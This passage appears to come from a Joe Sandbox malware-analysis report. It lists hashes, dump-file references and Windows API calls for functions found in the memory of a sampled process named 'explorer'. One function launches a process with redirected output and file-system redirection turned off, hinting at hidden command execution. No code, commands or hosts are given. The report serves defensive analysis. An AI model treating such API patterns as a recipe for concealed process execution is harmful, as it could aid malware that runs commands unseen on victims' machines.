• Opcode ID: 0db64de4106bfa3d32beaccf9859501c64a730206fbe7bfabf6dead1b9e96004
• Instruction ID: 43805f5d991cb834cac70762ab11cfc0e0ce384b40bb5eec7ed1c7affe508ff9
• Opcode Fuzzy Hash: 0db64de4106bfa3d32beaccf9859501c64a730206fbe7bfabf6dead1b9e96004
• Instruction Fuzzy Hash: 5121B673F209394B770CC47E8C5627DB6E1C68C511745823EE8A6EA2C1D96CD917E2E4
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9302e13d906365bb2a3d3a17de13bc564f27e69ebc70b68780de2410028c5a91
• Instruction ID: 952f945c7ad4b2241be7ac682878425ff5e40be0d02a8491e73ad2884437073d
• Opcode Fuzzy Hash: 9302e13d906365bb2a3d3a17de13bc564f27e69ebc70b68780de2410028c5a91
• Instruction Fuzzy Hash: 8C118A23F30C355B675C816D8C1727A95D2DBD825075F533ED827E7284E9A4DE13D290
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: c5a75eff3c480d017f2f6df32499307c079876ef148d61832a8fea3eff909151
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: 4B113DB72C048243D614E63DD4F46B7A795EBC5321B3C437AD0468B759E32AE9659B00
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free$Info
• String ID: `-{$.{
• API String ID: 2509303402-1149821797
• Opcode ID: 2a61fbc7daf029e06c7ddb84f52f7adbdc2fabee0b01128fe6e99c74622d5d60
• Instruction ID: 375856a04aa928c149ede3e5d5e18237455f0c22c33ba052f2dd38148a98629a
• Opcode Fuzzy Hash: 2a61fbc7daf029e06c7ddb84f52f7adbdc2fabee0b01128fe6e99c74622d5d60
• Instruction Fuzzy Hash: AFD17C71D00205EFDF21DFA8D885BEABBB5BF09300F144169E595B7282DB79A846CB60
APIs
• GetTempPathA.KERNEL32(00000080,?), ref: 0076832D
• CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00768403
• SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00768415
• Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00768459
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 00768481
• Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0076848F
• WaitForSingleObject.KERNEL32(?,00000064), ref: 007684B8
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007684DA
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007684FE
• ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00768525
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0076856A
• CloseHandle.KERNEL32(?), ref: 00768581
• CloseHandle.KERNEL32(?), ref: 00768589
• CloseHandle.KERNEL32(00000000), ref: 00768591
• CloseHandle.KERNEL32(00000000), ref: 00768599
• GetLastError.KERNEL32 ref: 007685A3
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
• String ID: D
• API String ID: 3215130363-2746444292
• Opcode ID: cf9395ec9d3c28d7a2a2045da656955b914da00bfe581b8e19f8a0380eebfbdd
• Instruction ID: dc91b341a1afb53071715daaa6d4a2eedf6e5d1adc3572104c9c187daacf2607
• Opcode Fuzzy Hash: cf9395ec9d3c28d7a2a2045da656955b914da00bfe581b8e19f8a0380eebfbdd
• Instruction Fuzzy Hash: 51A19171940218ABEF60DF64CC49FDDBB78AF04700F1042D5EA09B6191DB79AE84CF95
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free$___from_strstr_to_strchr
• String ID:
• API String ID: 3409252457-0
• Opcode ID: 2844f9588aaf9ace0a66b236c9d6b404834de7c8389b64f62ca9d43b1c57f9fb
• Instruction ID: 15ddc22b87fd94f6eb9946096bb27c08003eeecb7f6bb962a5f92b0e8e542e86
• Opcode Fuzzy Hash: 2844f9588aaf9ace0a66b236c9d6b404834de7c8389b64f62ca9d43b1c57f9fb
• Instruction Fuzzy Hash: 34D1D3B1A04305EFDF25AFB4A895A6E77B4AF06310F14817DF911E7292EB3D8900C7A1
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free
• String ID: @R|$@R|
• API String ID: 269201875-720877917
• Opcode ID: 4b13aa1cf16fd5a58057640777705f4e7ec6199363f98cc42f1c6f2a94957477
• Instruction ID: 4d835c5ff72c28c577048bf8a70652ee6c71f412898df85a4ad60832a2f262fa
• Opcode Fuzzy Hash: 4b13aa1cf16fd5a58057640777705f4e7ec6199363f98cc42f1c6f2a94957477
• Instruction Fuzzy Hash: 1BC145B2D40204EFDF20DBA8DD46FEE77F8AB49700F144565FA05FB282D6749A409BA0
APIs
• _free.LIBCMT ref: 007A11E8
  • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
  • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04C6
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04D8
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04EA
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A04FC
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A050E
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0520
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0532
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0544
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0556
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A0568
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A057A
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A058C
  • Part of subcall function 007A04A9: _free.LIBCMT ref: 007A059E
• _free.LIBCMT ref: 007A120A
• _free.LIBCMT ref: 007A121F
• _free.LIBCMT ref: 007A122A
• _free.LIBCMT ref: 007A124C
• _free.LIBCMT ref: 007A125F
• _free.LIBCMT ref: 007A126D
• _free.LIBCMT ref: 007A1278
• _free.LIBCMT ref: 007A12B0
• _free.LIBCMT ref: 007A12B7
• _free.LIBCMT ref: 007A12D4
• _free.LIBCMT ref: 007A12EC
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: @R|
• API String ID: 776569668-1592088083
• Opcode ID: cae3762d5b917524082f8b16828fc63323814f5b96e1f87dbb407f3574af343c
• Instruction ID: aa76b094f50bbe4c4781264271b5907eae66d00c3398b96521d59115380adc24
• Opcode Fuzzy Hash: cae3762d5b917524082f8b16828fc63323814f5b96e1f87dbb407f3574af343c
• Instruction Fuzzy Hash: E5315A72604201DFEF35AE79E909F5A73E8BF82351F544A29F449E6191DA38EC80CB60
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A04C6
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 007A04D8
                                                                                                        • _free.LIBCMT ref: 007A04EA
                                                                                                        • _free.LIBCMT ref: 007A04FC
                                                                                                        • _free.LIBCMT ref: 007A050E
                                                                                                        • _free.LIBCMT ref: 007A0520
                                                                                                        • _free.LIBCMT ref: 007A0532
                                                                                                        • _free.LIBCMT ref: 007A0544
                                                                                                        • _free.LIBCMT ref: 007A0556
                                                                                                        • _free.LIBCMT ref: 007A0568
                                                                                                        • _free.LIBCMT ref: 007A057A
                                                                                                        • _free.LIBCMT ref: 007A058C
                                                                                                        • _free.LIBCMT ref: 007A059E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 5352c5dc4a539f0b6b855e01d56ae6b2a95a4ef1b63a491925518ace6e31a6d0
                                                                                                        • Instruction ID: a78ad9e072e486bb9191c5821c38df61e442ddebad6cedaf1ec6c58b3a2a3e01
                                                                                                        • Opcode Fuzzy Hash: 5352c5dc4a539f0b6b855e01d56ae6b2a95a4ef1b63a491925518ace6e31a6d0
                                                                                                        • Instruction Fuzzy Hash: 3021C0B2518A00EBCA39EF68F589C1A73F9BB463117644D09F045E7651CB3DFCD08AA4
APIs
• IsInExceptionSpec.LIBVCRUNTIME ref: 0078CB0F
• type_info::operator==.LIBVCRUNTIME ref: 0078CB31
• ___TypeMatch.LIBVCRUNTIME ref: 0078CC40
• CatchIt.LIBVCRUNTIME ref: 0078CC91
• IsInExceptionSpec.LIBVCRUNTIME ref: 0078CD12
• _UnwindNestedFrames.LIBCMT ref: 0078CD96
• CallUnexpected.LIBVCRUNTIME ref: 0078CDB1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 4234981820-393685449
• Opcode ID: b135c5ec20a25f248f16c5be88bdb01c10ee3d0eab062547b530fdcc4377925a
• Instruction ID: a77035d774ffcc32e38053b4fdda0c67d2f8a2629a12a08905f5d034d9308c12
• Opcode Fuzzy Hash: b135c5ec20a25f248f16c5be88bdb01c10ee3d0eab062547b530fdcc4377925a
• Instruction Fuzzy Hash: F3B18F71940209EFCF1AFFA4C9859AEBBB5FF04310F1440AAE9156B212E339D911CBB1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3907804496
• Opcode ID: a4e12a968032e59e890fa0ea62136e15dffa71bb2a50cdd48398f5be2db731a6
• Instruction ID: bd7d3c058ab15b365dc8ed794c15acd769023132912d23387685af54a5c4a75f
• Opcode Fuzzy Hash: a4e12a968032e59e890fa0ea62136e15dffa71bb2a50cdd48398f5be2db731a6
• Instruction Fuzzy Hash: 29C1E174A04209EFDF15DFA8F985BAEBBB1FF4A300F144159E414AB392C7389941CB65
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free
• String ID: @R|
• API String ID: 269201875-1592088083
• Opcode ID: 5b448c6b9a1c06bd41fbb279480fac366e53ca73fa8612b5e304255013712a6f
• Instruction ID: 816335c4637bb828d5f9f9795bc615821e740084d03ca911462175bddd90b137
• Opcode Fuzzy Hash: 5b448c6b9a1c06bd41fbb279480fac366e53ca73fa8612b5e304255013712a6f
• Instruction Fuzzy Hash: 9661C3B1900205DFDF20DF74DD41BAAB7F9AB86710F104A69E945AB281EB74AD40CBA0
APIs
• _free.LIBCMT ref: 0079671E
  • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
  • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
• _free.LIBCMT ref: 0079672A
• _free.LIBCMT ref: 00796735
• _free.LIBCMT ref: 00796740
• _free.LIBCMT ref: 0079674B
• _free.LIBCMT ref: 00796756
• _free.LIBCMT ref: 00796761
• _free.LIBCMT ref: 0079676C
• _free.LIBCMT ref: 00796777
• _free.LIBCMT ref: 00796785
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 140245f09f769ecd5e53180c92b7647c2267d5b7d93c2c0fb72db2b8c1ff7038
• Instruction ID: 417eae8e14cde4109a4f212d0f42e2ca73a4d9a6a413d435af9e787300ccf9e2
• Opcode Fuzzy Hash: 140245f09f769ecd5e53180c92b7647c2267d5b7d93c2c0fb72db2b8c1ff7038
• Instruction Fuzzy Hash: BB21D4B6914108EFCF06EFA4D985DDE7BB8EF08340F0141A6F505AB121EB35EA54CB90
APIs
  • Part of subcall function 007A31FA: CreateFileW.KERNEL32(00000000,00000000,?,007A35EA,?,?,00000000,?,007A35EA,00000000,0000000C), ref: 007A3217
• GetLastError.KERNEL32 ref: 007A3655
• __dosmaperr.LIBCMT ref: 007A365C
• GetFileType.KERNEL32(00000000), ref: 007A3668
• GetLastError.KERNEL32 ref: 007A3672
• __dosmaperr.LIBCMT ref: 007A367B
• CloseHandle.KERNEL32(00000000), ref: 007A369B
• CloseHandle.KERNEL32(?), ref: 007A37E8
• GetLastError.KERNEL32 ref: 007A381A
• __dosmaperr.LIBCMT ref: 007A3821
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID:
• API String ID: 4237864984-0
• Opcode ID: 3171ae2f356693a4cfae4bdc860b29b118e60d23e00b1760ea96fc4efd294b33
• Instruction ID: d98cfb32c09e46215e45d2f101c84d4a17c6ccaccb8678d9a9286406c2bcc211
• Opcode Fuzzy Hash: 3171ae2f356693a4cfae4bdc860b29b118e60d23e00b1760ea96fc4efd294b33
• Instruction Fuzzy Hash: E8A11832A141549FCF199F68DC95BAE7BA1AB47320F14425DF801AF3A2DB3C9A12CB51
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
• String ID:
• API String ID: 3943753294-0
• Opcode ID: 2a6f6f95c2fa06d52bf69feff58edb323df9f0cd45d560d71854724e13605928
• Instruction ID: 593808ae93418d0f6dfa050b6c7b340ed61545775fee0f275eca489858e97491
• Opcode Fuzzy Hash: 2a6f6f95c2fa06d52bf69feff58edb323df9f0cd45d560d71854724e13605928
• Instruction Fuzzy Hash: 1B51A2B1A40209CFCF54EF18C9C596E7BF5FF48310B54855AE806AB295DB38ED40CBA6
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
• String ID:
• API String ID: 3990724213-0
• Opcode ID: 4e509fa6988ca03280f22059a9f1b04062122a5e04bc814ec050981ee1f920a2
• Instruction ID: 74485816d34a2ad11cefb348421912e5ab253e4dffa7dcf8772d76255275366a
• Opcode Fuzzy Hash: 4e509fa6988ca03280f22059a9f1b04062122a5e04bc814ec050981ee1f920a2
• Instruction Fuzzy Hash: 34B126B1D40609DFDB10EF64C849BAEBBF4FF05311F00456DE91697682EB39A905CBA2
APIs
  • Part of subcall function 00797E35: HeapAlloc.KERNEL32(00000000,007808E7,?,?,00789ABF,007808E7,?,007830BE,8B18EC84,74DF0F00), ref: 00797E67
• _free.LIBCMT ref: 00795046
• _free.LIBCMT ref: 0079505D
• _free.LIBCMT ref: 0079507A
• _free.LIBCMT ref: 00795095
• _free.LIBCMT ref: 007950AC
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free$AllocHeap
• String ID: |={
• API String ID: 1835388192-261466156
• Opcode ID: d2b17cead7992f67fff150e5145dcf2f79b0ae9d2d0d44a9fbf43d218bd530c3
• Instruction ID: 7ecff086502a0fc564af14bae50f71736be5d217956050cbf7fe031d6a0760f0
• Opcode Fuzzy Hash: d2b17cead7992f67fff150e5145dcf2f79b0ae9d2d0d44a9fbf43d218bd530c3
• Instruction Fuzzy Hash: 4251AF72A00B05EFDF26DF69EC41B6A77F5EF48720B140569E805D7250E739EA41CB80
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID: list too long
• API String ID: 0-1124181908
APIs
• _ValidateLocalCookies.LIBCMT ref: 0078C517
• ___except_validate_context_record.LIBVCRUNTIME ref: 0078C51F
• _ValidateLocalCookies.LIBCMT ref: 0078C5A8
• __IsNonwritableInCurrentImage.LIBCMT ref: 0078C5D3
• _ValidateLocalCookies.LIBCMT ref: 0078C628
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
Strings
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
APIs
  • Part of subcall function 007A0BD4: _free.LIBCMT ref: 007A0BF9
• _free.LIBCMT ref: 007A0ED6
  • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
  • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
• _free.LIBCMT ref: 007A0EE1
• _free.LIBCMT ref: 007A0EEC
• _free.LIBCMT ref: 007A0F40
• _free.LIBCMT ref: 007A0F4B
• _free.LIBCMT ref: 007A0F56
• _free.LIBCMT ref: 007A0F61
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00797207
• __fassign.LIBCMT ref: 007973EC
• __fassign.LIBCMT ref: 00797409
